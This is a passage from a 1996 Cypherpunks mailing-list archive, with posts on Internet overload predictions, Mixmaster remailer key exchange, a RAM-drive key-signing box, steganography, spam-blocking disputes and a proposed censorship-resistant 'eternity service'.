more likely to achieve the noble cause. It's also more impressive (than whining). .. Blanc From minow at apple.com Sun Sep 8 16:50:32 1996 From: minow at apple.com (Martin Minow) Date: Mon, 9 Sep 1996 07:50:32 +0800 Subject: Imminent Death of the Internet, GIF at 11 Message-ID: For several months (years?) Bob Metcalf has been predicting that the Internet will self-destruct from overload. His argument appears to follow one of Gordon Bell's maxims: "anyone can predict the future: all you need is semi-log paper and a ruler." As I understand it, Metcalf's argument is that network load (messages, packets) is growing exponentially, while network bandwidth (fiber capacity, switch performance) is growing linearly. At some point, these two curves cross -- and demand will exceed capacity. There are two solutions to this problem: either there will be a fundamental change in the way messages move on the Internet (i.e. they don't all have to pass through Mae East and/or Mae West) or there will be a fundamental change in the way we use the Internet. We certainly are seeing changes in the way we use the network. When I "got on the net" in the late 1970's, I was on two mailing lists (SF-Lovers and Human Net) and could read *all* of Usenet traffic in an hour or two. In the late 1980's, Usenet traffic totalled about 10 MB/Day. Now, I'm on a handful of work-dependent, low bandwidth mailing lists, one high-bandwidth, high noise mailing list, almost never read Usenet and wouldn't dare attempt to support a Usenet newsserver. Today, it takes longer for me to read mail on an office Internet or 28.8 modem at home, than it did in 1980 on a 2400 baud modem. To make a long story short, I suspect that we will be much more selective in what we access on the net; we may hire editors (or form communities that share "interesting stuff", each person serving as one member of an informal editorial board). We will also see organizations (companies or professional societies) funding network-based publications to communicate matters of common interest. (There are a number of these already, Risks Digest being possibly the most important.) So, in one sense, Metcalf is right; the Internet will self-destruct. However, in another sense, he is wrong; the information carried on the Internet will still be distributed, but probably in a different form. Martin Minow minow at apple.com From dfloyd at io.com Sun Sep 8 17:33:21 1996 From: dfloyd at io.com (Douglas R. Floyd) Date: Mon, 9 Sep 1996 08:33:21 +0800 Subject: What the NSA is patenting In-Reply-To: <199609080449.AA28514@crl11.crl.com> Message-ID: <199609082159.QAA13284@xanadu.io.com> > > Burning the floppy would seem to solve the problem. Lock sensitive > data in RAM away from disks except for burnable floppies. I guess > linux can be configured to keep sensitive data in a RAM filesystem, > keeping it from being synced or flushed. > Currently, I am hacking up a prototype of an armored keysigning box using an old 386. This box signs/decodes incoming E-mail as long as the key switch is in the correct position. The key remains in /dev/ram0, and is encrypted, as well as stored in a .au file. For one of the keys, I am using a hacked des program that reads a file off a floppy for the TDES key before copying the PGP key into the ramdrive. What I plan to do is write software so that multiple floppies are needed to load the key into the RAM filesystem, and to "lock" the machine. After the key is loaded, all network daemons are killed except smail, and all gettys are killed. This makes it hard for someone locally to get to the RAM drive. If the box is rebooted, or turned off -- bye bye RAM drive. From zachb at netcom.com Sun Sep 8 17:34:31 1996 From: zachb at netcom.com (Z.B.) Date: Mon, 9 Sep 1996 08:34:31 +0800 Subject: talker (fwd) In-Reply-To: <199609082141.QAA03554@einstein> Message-ID: On Sun, 8 Sep 1996, Jim Choate wrote: > > > Date: Sun, 8 Sep 1996 13:23:06 -0700 (PDT) > > From: "Z.B." > > Subject: Re: talker > > > > I just checked www.juno.com to see what kind of system they have, and it > > appears that it is a free email service. No charges at all. No wonder > > we get so many idiots from there - free mail and they probably don't > > bother to verify the people they give service to, either. > > Well we know at least one cpunk who is anti-anonymity.... > Pardon me, but I don't recall writing that when I wrote this message. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From aba at dcs.ex.ac.uk Sun Sep 8 18:08:34 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Mon, 9 Sep 1996 09:08:34 +0800 Subject: forward secrecy in mixmaster In-Reply-To: Message-ID: <199609081829.TAA00310@server.test.net> Lance Cottrell writes on several lists: > >I wrote the socket stuff yesterday evening, didn't take too long as > >socket programming is something I've done lots of. > > > >Now comes what do you actually send down the sockets. > > > >Question for Lance, and any others who were involved in mixmasters > >implementation: what did you have in mind as a way of negotiating the > >DH keys? > > > >I notice that mixmaster generates a DH key and stores it in file > >`DH.mix', but that this is not (as far as I can see from the source) > >included in the remailers public key block. > > No, it is not in the key block. It would be passed during the negotiation. Well the first DH parameter set (in a series of re-keyed DH parameters) could just as easily go in the public key block. If you were not doing rekeying, it would make sense to put the public DH parameters in the key block, as it would remove the need to negotiate these parameters, and simplify the protocol. As you're doing rekeying, putting the parameters in the public key block makes a less orthogonal protocol, adds nothing, and has the negative effect of breaking compatibility with previous public key blocks. In short for a rekeying protocol I agree :-) > >[bigger keys!] > > Call me paranoid. After asking and reading around I decided I wanted to > cover my bases. It looked like, in the future, it might be easier to break > with small generators. Fair enough. > This is not a critical decision though. I too would have liked it > longer, but using RSAREF I am limited. I suspected RSAs weird license might be the problem. (Given the situation with PGP 2.x, I presume that the license does not permit you to increase the max arithmetic precision.) > That is one of the reasons I have each remailer creat its own DH > modulus, and allow it to change it periodically. Each remailer with it's own prime doesn't buy you a whole lot of entropy because there aren't many mixmaster remailers, 4 bits currently?. The entropy from having rekeying every day instead of say every year, another 9 bits, 13 bits tops? I'm not sure what the precise entropy increase is from going to 1024 to 4096, but it's got to be many orders of magnitude better than 13 bits. I'd say junk RSAREF for the DH operations, use one of the other libs. (You can do this for DH, without violating patents, right? But not for RSA, so I guess if you care about the patent/license agreement mess, you've got to use RSAREF for RSA signatures at least). Or maybe you could just wait for PGP 3.0 which uses El Gamal, for sigs and pk encryption, and presumably will have less restrictive key sizes. So as well as having bigger signing keys, for the sake of paranoia (it's contagious), as you were saying, I guess you may gain some security by not having a common modulus, and making the protocol allow re-keying. If you used a different password for RSA and DH keys, and your machine is compromised, you can sign a new DH key with RSA, and use El Gamal signatures with the DH key normally. Hows that for paranoid :-) (Or another temporary RSA key, and RSA sigs, rather than El Gamal sigs, whatever. You sign by proxy, that is the receiver mixmaster gets a the temporary key signed by the long term RSA key, checks the signature on the temporary key, and then checks the signature made by the temporary key on the object in question). Greatly reduces the risk of having the password in the binary. You'd need to manually type the RSA keys password to rekey, or if you were real paranoid, you could keep the RSA key on your laptop, and copy the new signed DH public key on to the remailer. Do this once a month, or as often as you wish. This is a similar approach to that taken by people who have a huge signing only PGP key, which they are careful to keep only on machines they physically control, and have smaller keys which they use on multi-user systems. This also formalizes the situation where remailers have been compromised, or suffered disk crashes. The operator says, "sorry folks new type2 key for mixmaster at xyz.org", and if you're lucky signs his post, and also his post of the original key, so that you know it's not a hijacker, and if you're even more lucky, the user was around when the first post was made, or searches through the archives for it, and checks that the sigs show a persistent identity for the operator. An improvement right? The remailers keep both their signing keys, and their temporary signing keys available by request, the signing key should not change through the remailers life-time. > >A common modulus may offer a fatter target for attack (for some > >precomputation attacks), but with large enough keys this probably > >isn't that bad, as there aren't that many mixmasters anyway. > > > >With a common modulus there is DH key negotiation needed, just include > >it with the source. > > You have spelled out why I like having each remailer use its own modulus. yeah, ok, I agree no common modulus. And rekeying. > >a) include the DH key signed by the RSA key in the remailers public key > > (may break backwards compatibility with existing versions of > > mixmaster) > > > >b) send the DH public key at the start of each session > > > >c) send the DH public key on request > > I chose C. The in protocol I developed the sending remailer (A) sends a > hash of the DH modulus to the receiving remailer (B). If B has it, they use > it. If not, A sends it. I use the modulus from A because it has the stake > in privacy. B will take messages from anyone, but A wants to know the > messages it has goes to the correct other remailer B. sounds fine. Also, you might want to migrate to SHA1 in place of MD5, at some point. Or to one of those megahashes like SHA1(MD5(x))||MD5(SHA1(x)) Also mixmaster has capabilities like type 1 remailers right? If so you would presumably add a capability indicating that the remailer supports direct socket delivery. And another capability for forward secrecy (the other thread "non-interactive forward secrecy" discusses ways to retro-fit a less interactive forward secrecy mechanism into email delivered mixmaster packets). The socket capability presumably would be useful to know that it is likely to react more quickly. Forward secrecy is obviously nice to know about for other reasons. Adam -- #!/bin/perl -sp0777i Message-ID: <9609082254.AA26712@etna.ai.mit.edu> >Either that, or the fear that authorities are no longer necessary unless >they can point to something dangerous that they're protecting the rest of us >from - with the plausibility of the Godless Communist Threat waning, it >becomes necessary for drug sellers and people with fringe politics to appear >more threatening. I don't think the same case can be made for the drug sellers and militias providing a political justification for the military industrial complex in the same way the USSR did. It is true that the USSR was always a more credible threat to hawks in the pentagon than to people who analysed the situation, many of whom realised that the USSR was facing a terminal crisis before Afghanistan. Even so I don't think that the drug or millitia threat could every be hyped to a level which would justify huge subsidies to Boeing, McDonnald-Douglas, Ratheon etc. >Can you >imagine the military spontaneously downsizing, or failing to oppose >reductions in force? Its interesting that none of the candidates in the current election are willing to address the question of whether the US really needs to maintain the military budget at its cold war levels even after the alledged threat has collapsed. Indeed the Republicans are suggesting spending several billion on building an anti-ballistic missile system when none of the alledged "threats" has a ballistic missile with appropriate range in the first place. The likely nuclear scenario is for someone to smuggle a bomb in in a truck. >While domestic terrorist events may bring a sharper focus to discussions of >the merits and costs of politically motivated violence, your fantasy that it >will somehow bring about a change in someone's substantive politics is >amusing. US contributions to NORAID dropped by a half in the wake of the Lockerbie incident. Its difficult to make any conclusions about the current drop in funding since they might be due to the peace process, domestic terrorism or both. >Further, your notion that "terrorism" has somehow been limited to "far-off >irredentist struggles" of concern only to expatriates is ridiculous. Have >you not noticed the arson, bombings, and shootings at abortion clinics in >the US? Or the history of violence on the (neo-) left, e.g., the Weather >Underground, etc.? Or the history of the KKK and race-motivated >lynchings/beatings? Or the Unabomber? With the possible exception of the activities of the KKK I don't think you make your case. The KKK explicitly persued a strategy of terror to create a political effect through intimidation. The Unabomber was probably just a crank for whom the political ideology was merely an excuse to indulge in psychopathic behaviour, in the absence of a political motive another would have been found. While this supports my general comment that terrorism in general is caused by psychopaths rather than people with legitimate grievances I don't think that the Unabomber fits the normal profile. He was a single individual, not a group. >Isn't it wonderful that "one" unavoidably "reaches conclusions" which >eliminate moral and political arguments you find uninteresting? I don't find the arguments themselves uninteresting. I just find the mode of argument superficial. If people are arguing in terms of "rights" but cannot justify why something is a "right" then they are simply promoting their conclusions to axioms, its begging the question. The argument is uninteresting because it is not an argument, it is merely a restatement of the original claim. Arguing the right to bear arms on the basis of the right to bear arms is not an interesting "argument". >Boy, if we could just figure out the right combination of procedural rules, >we could simply abandon all of this problematic "rights" stuff. Wouldn't >that be a lot simpler? These pesky "rights" keep getting in the way of >legitimate government needs. Shit. If you read Mill's "On Liberty" you will find that he is very clear that rights are the consequence of a social/governmental process and that it is not possible to talk of "rights" outside the context of laws. The difficult philosophical questions of "rights" is recognising when there is a conflict between rights and deciding which right to favour over another. I assert that every child has a right to food, shelter and education, I do so by recourse to a Utilitarian argument but I could equally well ground my argument in terms of Contractarianism or use a Kantian argument. Now if you assert that the right of the individual to opt out of society and not pay taxes is paramount this creates a problem, how is the conflict between the right I propose and the right you propose resolved? >Don't forget that it's necessary to adopt an exaggerated version of your own >position, such that you can "compromise" your way to "agreeing" on exactly >what you wanted in the first place. No, that is not necessarily the case. It is usualy usefull to set out a bargaining position that is maximalist and to avoid being more reasonable than the opposition. But to stake out a completely extreeme position means that the conclusion may be reached that agreement is not possible at all and that consequently there is no purpose in negotiation. In order for the pro/anti-abortion camps to become entrenched in the political process in the manner they have it was necessary for the anti-abortion people to deliver the Republican party a block vote of about 2 million voters through the Christian Coalition. Its only possible to take an absolutist position if you can deliver a well defined voting block. The Internet cannot currently deliver such a vote. Phill From jya at pipeline.com Sun Sep 8 18:50:55 1996 From: jya at pipeline.com (John Young) Date: Mon, 9 Sep 1996 09:50:55 +0800 Subject: Cypherpunks subscribers - Singapore and NZ gvts, plus IRS Message-ID: <199609082254.WAA04422@pipe3.t1.usa.pipeline.com> Tim May, among others, often reminds that the list is wide open to all comers, from whatever domain. I'm happy to see the diverse range of domains, especially those I snoop for good alt.sex.bestiality pix, er, classified data. The sg, gov and mil sites offer best of show sexual defectives. Beloved IRS is still a bit touchy about snooping its vast sewer of exon-oddities, though, so don't leave a mess when you've finished ogling Tim's. From Adamsc at io-online.com Sun Sep 8 18:53:37 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 9 Sep 1996 09:53:37 +0800 Subject: Photoshop, Steganograhy, and cypherpunks? Message-ID: <19960908233159843.AAA224@IO-ONLINE.COM> On Sun, 8 Sep 1996 16:16:58 -0400 (EDT), Jason Vagner wrote: >> > 1) If I hide some PGP encrypted data in a >> > gif, jpg or wav file will there be any tell tale >> > signs to the naked eye of an expert? If yes, >> > what are they? >> If you stego too many bits in a figure, it may become apparent. >The new version of Photoshop coming out this fall includes the ability to >embed "digital watermarking": >(from http://www.news.com/News/Item/0,4,3188,00.html: > > Digital watermarking > adds copyright information to > a photograph that doesn't alter the photo's > appearance. The watermark is detectable even > after the photo is edited or printed and rescanned. > >Question: Will stegonagrphying (?) the picture with noise mar the >watermark? Will a digital signature *and* something embedded into the >graphic through steganography seriosly affect a 24-bit image? Most certainly; the idea here is that watermarking should show that an image is unedited. >Furthermore: What about browsers? Could cookies or binary info be embedded >into images on the fly so that a java applet could preserve information or >states between pages, of different sites? Of course. You could do a cookie type implementation with a Java applet easily. - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From Adamsc at io-online.com Sun Sep 8 19:18:34 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 9 Sep 1996 10:18:34 +0800 Subject: talker Message-ID: <19960908232620265.AAA85@IO-ONLINE.COM> On Sat, 07 Sep 1996 20:10:50 -0700, James A. Donald wrote: >> Yup -- you're never going to see a very high SNR out of Juno: > >Yes, the anarchy list has a persistent moron from Juno.com, educated >well above his intelligence. A seriously proflic loon. > >I have told eudora to transfer everything from juno.com into my >loon file, regardless of author. Makes AOL.com look like >caltech. Particularly since AOL tends to get a lot of well-educated people who are just net-illiterate. Of course, they also get a bunch of cranks, particularly since those "Generate an AOL account" programs started going around... - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From Adamsc at io-online.com Sun Sep 8 19:23:50 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 9 Sep 1996 10:23:50 +0800 Subject: talker Message-ID: <19960908232414750.AAA81@IO-ONLINE.COM> On Sun, 08 Sep 1996 11:09:07 -0400, Wayne H. Allen wrote: >> cypherpunks are *not* crackers; this is a crytographic >> and political issues relating to cryptography mailing list. > Well maybe, political issues galore certainly, but very very little >to do with cryptography. I mean what does TWA 800 have to do with this >list. I mean lets be completely honest here, whatever the original >purpose of the list was for its been allowed to shift away from its >intended purpose considerably. True, but something like TWA800 has a lot more relevency to the "political issues" part mentioned above. A Big-Brother database being setup seems on-topic... - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From abostick at netcom.com Sun Sep 8 19:26:01 1996 From: abostick at netcom.com (Alan Bostick) Date: Mon, 9 Sep 1996 10:26:01 +0800 Subject: [NOISE] Far-reaching tentacles . . . ? Message-ID: <199609082338.QAA18544@netcom19.netcom.com> Found in the news: (SACRAMENTO)- The principals of six Sacramento area schools have received 46 used computers that were renovated by inmates at Folsom Prison. Warden Theo White delivered the machines after they were given a reprieve from the scrap heap. The prison obtained the donated personal computers from the non-profit Detwiler Foundation... which began working five years ago to bring new technology into the state's classrooms. [Would you want *YOUR* CHILDREN to use computers that had been HACKED by CONVICTED CRIMINALS????] -- Alan Bostick | Usenet is living proof that if you analyze a mailto:abostick at netcom.com | blackbody spectrum for semantic content you get news:alt.grelb | "Call 1-800-HOT-GIRL now!" http://www.alumni.caltech.edu/~abostick From sasha1 at netcom.com Sun Sep 8 19:31:22 1996 From: sasha1 at netcom.com (Alexander 'Sasha' Chislenko) Date: Mon, 9 Sep 1996 10:31:22 +0800 Subject: Imminent Death of the Internet, GIF at 11 Message-ID: <2.2.32.19960908231147.0129c1fc@netcom.com> At 10:40 AM 9/7/96 -0700, Martin Minow wrote: >For several months (years?) Bob Metcalf has been predicting that >the Internet will self-destruct from overload. His argument >appears to follow one of Gordon Bell's maxims: "anyone can predict >the future: all you need is semi-log paper and a ruler." As I >understand it, Metcalf's argument is that network load (messages, >packets) is growing exponentially, while network bandwidth (fiber >capacity, switch performance) is growing linearly. At some point, >these two curves cross -- and demand will exceed capacity. > I would add one word into that Gordon Bell's maxim: "anyone can predict the SHORT-TERM future: all you need is semi-log paper and a ruler." Rulers are liner-extrapolation predictors; the only predictions with still lower intelligence are pointers - with the assumption that things are going to always remain the same. Unfortunately, these two kinds of prediction methods populate most of the human "visionary" landscape, with rare flowers of visionary minds elevating above it - Metcalf's doesn't seem to be one of them. This very observation on the population/food dilemma was made by Malthus quite a while ago. However, both population and food are still here, and natural resources are no longer a serious limiting factor for the production of food. If you notice that your attempt to extend your ruler farther than it can go, will not work, it's a good prediction of a breakdown - *of the ruler*, not the system you are trying to measure. The role of a visionary is not to mistake the horizon of current trends for the horizon of the world, but look ahead and predict future trends - and advise what should be done to adapt to the imminent transitions. An important observation for the net traffic/bandwidth "crisis" is that human ability to perceive textual and visual information remains pretty much the same. Addition of graphics, video and sound to the Net, as well as the growing number of users, increase the bandwidth, but this all has (though still distant) saturation point - say, 24 hour-a-day single-channel video feed to every human and his dog. (Inter-machine communications do not have this limit though). Already, most of the newsfeed coming to any single server, is never read by anybody; this is also the fate of most messages from 60 or so mailing lists coming to my PC. A solution here, that will be also quite instrumental for many future problems, is not to send messages that are not going to be read - i.e., server-side filtering agents; I have been suggesting collaborative message filtering (see proposal on my home page) for more than 5 years now - only to find people who could help implement it, uselessly running around the Net whining and waving their stiff rulers. Of course, there are also other methods of making Net traffic more intelligent and robust; if Internet was recognized as the most revolutionary development in the evolution of the global ecology of intelligence, and if there existed some mechanism for turning truly visionary ideas on the Net's evolution into changes in its structure, then, well, things would be much better. ---------------------------------------------------------------------------- Alexander Chislenko < www.lucifer.com/~sasha/home.html Firefly Network, Inc.: < www.ffly.com ---------------------------------------------------------------------------- From scrappo.reverb at juno.com Sun Sep 8 19:33:59 1996 From: scrappo.reverb at juno.com (A L) Date: Mon, 9 Sep 1996 10:33:59 +0800 Subject: 9yrold In-Reply-To: <19960908.125436.3318.0.Doom13@juno.com> Message-ID: <19960908.165602.4527.1.scrappo.reverb@juno.com> On Sun, 08 Sep 1996 14:44:40 EDT doom13 at juno.com (Floyd W Odom) writes: >Does anyone out there know any kids mailing lists, because my little >brother Richard just joined and he doesn't have anything to mail to >he's only 9 years old. > > > >floyd odom This message has nothing to do with the subject of this mailing list, which is as stated in the Information File which you should have read, Encryption and other related issues. Your actions have been a nuisance, and you should cease your message writing endeavor. In regards to your message, have him write messages to you stating how he thinks you should stop writing to him, and how he doesn't need e-mail anyways. ~~~~~~~~~~~~~~~~~~~~ s/n ratio has been raised. Keep a tab on it. From webeus at sprynet.com Sun Sep 8 19:40:32 1996 From: webeus at sprynet.com (Webeus) Date: Mon, 9 Sep 1996 10:40:32 +0800 Subject: Mailing list Message-ID: <323357CF.28F0@sprynet.com> Hello, I have been away for over 2 months and in returning find that alpha.c2.org is lo longer. Can you suggest an alternative, FAQ's etc ?? Thank you Webeus From wombat at mcfeely.bsfs.org Sun Sep 8 19:51:54 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Mon, 9 Sep 1996 10:51:54 +0800 Subject: talker In-Reply-To: Message-ID: Complaints about spamming and cross-posting probably won't get you far, either. On-Net spamvertizing seems to be their source of revenue. Perhaps shaw.net needs to be contacted instead. It's either that, or give Floyd and Richard a nickle to go watch batman instead of playing with the computer. - r.w. On Sun, 8 Sep 1996, Z.B. wrote: > On Sat, 7 Sep 1996, James A. Donald wrote: > > > At 12:26 PM 9/8/96 -0500, Roger Williams wrote: > > > Yup -- you're never going to see a very high SNR out of Juno: > > > > Yes, the anarchy list has a persistent moron from Juno.com, educated > > well above his intelligence. A seriously proflic loon. > > > > I have told eudora to transfer everything from juno.com into my > > loon file, regardless of author. Makes AOL.com look like > > caltech. > > I just checked www.juno.com to see what kind of system they have, and it > appears that it is a free email service. No charges at all. No wonder > we get so many idiots from there - free mail and they probably don't > bother to verify the people they give service to, either. > > > --- > > Zach Babayco > > zachb at netcom.com <----- finger for PGP public key > http://www.geocities.com/SiliconValley/Park/4127 > > > > > From frogfarm at yakko.cs.wmich.edu Sun Sep 8 19:52:44 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Mon, 9 Sep 1996 10:52:44 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: Message-ID: <199609082348.TAA04495@yakko.cs.wmich.edu> > > The judge did mention "status quo" in his opinion. I would hope that > "status quo" would mean the ability of ISPs to offer and enforce whatever > contracts they want -- including banning incoming spam -- without the > intervention of the government. Unless, of course, the ISP breaks the > contract, but in that case the plaintiffs should be the customers, not > the spammer. Aren't spammers customers, by definition? If so, they have just as much right to bring suit as any other customer. Less moral justification, yes, but an equal standing in the law's eyes. -- I let go of the law, and people become honest / I let go of economics, and people become prosperous / I let go of religion, and people become serene / I let go of all desire for the common good, and the good becomes common as grass. .oOo. [Tao Te Ching, Chapter 57, Stephen Mitchell translation] From jf_avon at citenet.net Sun Sep 8 19:58:46 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Mon, 9 Sep 1996 10:58:46 +0800 Subject: [PARANOID NOISE] Satellites flying formation? Message-ID: <9609082355.AA11764@cti02.citenet.net> On 8 Sep 96 at 12:16, John F. Fricker wrote: > >I don't know. I would presume so. I only guess that it was a 3-4-5 > >formation. But it does make some constants easy! > Maybe we could each watch for these formations and keep a log of > observations. I've done a little searching for more information but > I find nothing easy. Perhaps one of my hard core skywatcher friends > would know something as well. I'll try to link with my old stargazers friends and ask questions around. If you get something new, write. Cheers and good luck! jfa From declan at eff.org Sun Sep 8 19:59:49 1996 From: declan at eff.org (Declan McCullagh) Date: Mon, 9 Sep 1996 10:59:49 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <199609082348.TAA04495@yakko.cs.wmich.edu> Message-ID: No. A customer buys service from AOL and in doing so signs a contract with the company. AOL and the customer each has certain rights and obligations spelled out in the contract. I confess I don't know if AOL's contract allows them to block spam. But in any case, spammers are not customers. -Declan CONTRACT - LEGAL DEFINITION A contract, expressed or implied, is binding when six elements are present: 1. Parties involved have the capacity to enter into a contract, i.e. mental capacity and requisite age, or the authority to obligate the institution. 2. The contract must be based on an offer. 3. The offer must be accepted (acceptance by a written or oral promise - expressed acceptance, or by performance of the task in question implied acceptance. 4. The offer and acceptance must be mutual. The key here is proof of a "meeting of the minds" on terms and nature of the promise. 5. There must be performance in order for one or both parties to be bound by the mutually agreed terms of the contract. (An institution would not be obligated to pay until the contractor performed services agreed upon). 6. The contract must be for a legal purpose or it will not be binding. On Sun, 8 Sep 1996, Damaged Justice wrote: > > > > The judge did mention "status quo" in his opinion. I would hope that > > "status quo" would mean the ability of ISPs to offer and enforce whatever > > contracts they want -- including banning incoming spam -- without the > > intervention of the government. Unless, of course, the ISP breaks the > > contract, but in that case the plaintiffs should be the customers, not > > the spammer. > > Aren't spammers customers, by definition? If so, they have just as much > right to bring suit as any other customer. Less moral justification, yes, > but an equal standing in the law's eyes. > > -- > I let go of the law, and people become honest / I let go of economics, and > people become prosperous / I let go of religion, and people become serene / > I let go of all desire for the common good, and the good becomes common as > grass. .oOo. [Tao Te Ching, Chapter 57, Stephen Mitchell translation] > // declan at eff.org // I do not represent the EFF // declan at well.com // From aba at dcs.ex.ac.uk Sun Sep 8 20:22:49 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Mon, 9 Sep 1996 11:22:49 +0800 Subject: towards an eternity service Message-ID: <199609082212.XAA00383@server.test.net> [the relevance of this to remailer-operators, is that my example prototype architecture for discussion relies heavily on mixmaster remailers] Ross Anderson's eternity service (postscript paper somewhere on http://www.cl.cam.ac.uk/~rja14/) is a distributed file system with the criteria that it should not be possible to delete information from it. The paper outlines ways that you might go about doing this, and gives as a design goal that it should not be possible even for concerted government attacks to remove information from the service. Roughly the approach described is to have anonymous servers with secret shared data. The server doesn't know what it is serving, and the server charges per Mb/year of data storage. This seems a pretty interesting idea, as it would be a great boon to free speech to be able to reliably publish information that would survive attempts to "unpublish" it, which seem to be gaining in popularity. Notable recent examples of such attacks being Scientologist attacks on distribution of it's `scriptures', the German governments banning of nazi revisionist material, and the impending possibility of a repeat of the CDA at a (US) state level. I think it is desirable to get something working now, even if it is far short of the design criteria Anderson describes. A working model would provide something on which to base discussion of improvements, and would also be an interesting experiment to see the sorts of uses such a system would be put to, and the political reaction to it's uses. The following doesn't depend on, but would be helped by having direct socket delivery of packets (for performance) in the mixmaster remailer-net and forward secrecy (for resilence to attack). The idea comes in two parts, the first part, an anonymous www proxy using mixmaster to deliver packets, is present to provide cover traffic for real eternity system requests, the second part describes a way to acheive an eternity like system with the traffic mixed in with part 1 traffic, so that the two types of traffic can not be distinguished by attackers. 1. anonymous www proxies over mixmaster The stated design goal for this part (it's partly a cover goal, though useful in its own right) is to ensure that users can access publically accessible www pages without divulging their identity to the sites they are accessing, or even to an attacker who is monitoring net traffic. The user wants to hide which sites they are accessing, and what information they are accessing. No attempt is made to conceal the identity of the www sites accessed, a normal URL is used to access them. This is basically just like www.anonymizer.com, except that traffic is routed over the mixmaster net. An http <-> mixmaster interface would be added to the existing mixmaster. You add a blip in the line for outgoing traffic on your own machine which converts all outgoing http requests into mixmaster packets and feeds them into the remailer network. You choose random chains to get to the http servers. The delivered packet at the exit remailer node is a new mixmaster packet type, a http request type, rather than a request to email to an individual, or post to a newsgroup, it results in an (where possible SSL encrypted) http request being made to the specified http server. Also included with the request is a mixmaster reply chain, so that the exit mixmaster node can route the return the requested www pages, and SSL session traffic back to the originator. As you might imagine if this became popular, it could generate a lot of traffic. For a practical system I think it's inevitable that you'd need to provide some financial incentive for the mixmaster operators to subsidize their T3s :-) So you would need to incorporate per hop payments, for the remailers. This could be a relatively small payment, but is just there to ensure that they have the money to increase their bandwidth if the demand requires it. I think that about explains part 1. 2. an eternity like system built on this system There are a couple of extra requirements for the eternity system, firstly that the address of the www site must be concealed also, and secondly that the data is secret shared across multiple eternity www sites. The first requirement can be met by the anonymous eternity www sites publically posting to a newsgroup (via a mixmaster remailer of course:-) a mixmaster chain pointing at themselves. To reduce the problem of the flood attack for finding the endpoint of a chain, firstly some of Peter Allan's suggestions on extra cover traffic, and on adding extra hops to increase cover traffic should help, but ultimately this only makes a longer concerted flood necessary to find the output. I don't see any easy solution to the flood attack, the only _real_ answer is a DC net. A slightly simpler, but less robust solution would be to find ways to have fixed levels of traffic between nodes in the remailer network. Surplus traffic at entry points could be rejected, so that the sender knows to try another remailer. The other requirement for eternity is that the data should be secret shared. If all the eternity www servers publish their reply blocks, the user sends requests to a number of the eternity servers selected randomly. Choose the number so that it is likely that you will get the required k of n shares, given that there are n servers, and they all hold shares in the data, and that k of n shares are required to recover the secret. You also need to ensure that the exit mixmaster which is acting as a http forwarder server can't tell whether it is making an eternity system request or an anonymous www proxy request. The fact that http traffic is blindly forwarded means that if the http request is SSL encrypted the http forwarding mixmaster remailer will not know the contents of the traffic, and so will not be able to distinguish traffic type: eternity or anonymous proxy. As the eternity www servers don't know what the data in the shares they are holding is, they can't provide the indexing facility directly. Rather ordinary www pages, and other eternity www pages can be used to collect links to interesting eternity pages. In otherwords, it's decentralised, as is the www, and any indexing left up to the authors of eternity hosted www documents, or anyone elses indexing to interesting links. A compromise technology which would greatly simplify access to the service would be public www proxies or gateways to the eternity service, so that no new software was required for the client. This would serve a similar role to WWW based remailers. The scheme is complex in places but basically requires no new technology, at least for a crude implementation, without the finer points. What can be missed out in a first pass implementation, and deferred for later incremental improvements: ecash postage to pay for remailer resources fixed traffic between remailers payment for www sites (anonymous www proxy and eternity service) oblivious transfer to setup shares so that leaves the following to be done: blip in the line which routes http requests over mixmaster mixmaster reply chains for return http traffic secret sharing of data to send to eternity www servers periodic posting of mix reply blocks by eternity www servers public access www proxy, or www-cgi based gateway comments, volunteers? Adam -- exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ #!/bin/perl -sp0777i At 7:56 PM 9/8/96, Declan McCullagh wrote: >I suppose it would be only polite to ask the Singapore government folks >and IRS employees to join our conversation. > >The cypherpunks list now has nearly 1,400 direct subscribers, plus >whoever reads it through local mail-news gateways. > >(Note I'm not indicating that a .gov.sg or .irs.gov address implies >anything about an individual's personal political beliefs.) > >video at nhmxw0.fnal.gov >e875836 at popcorn.llnl.gov >foley_p at kosmos.wcc.govt.nz .. What, so now my group, Government Office of Technology, is no longer considered part of the military-bureaucratic complex? -- tcmay at got.net (And to think I get paid a GS-16 salary just to keep tabs on you folks, feed you disinformation, and entice you into various operations.) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Sun Sep 8 20:53:05 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 9 Sep 1996 11:53:05 +0800 Subject: Imminent Death of the Internet, GIF at 11 Message-ID: At 5:40 PM 9/7/96, Martin Minow wrote: >We certainly are seeing changes in the way we use the network. When >I "got on the net" in the 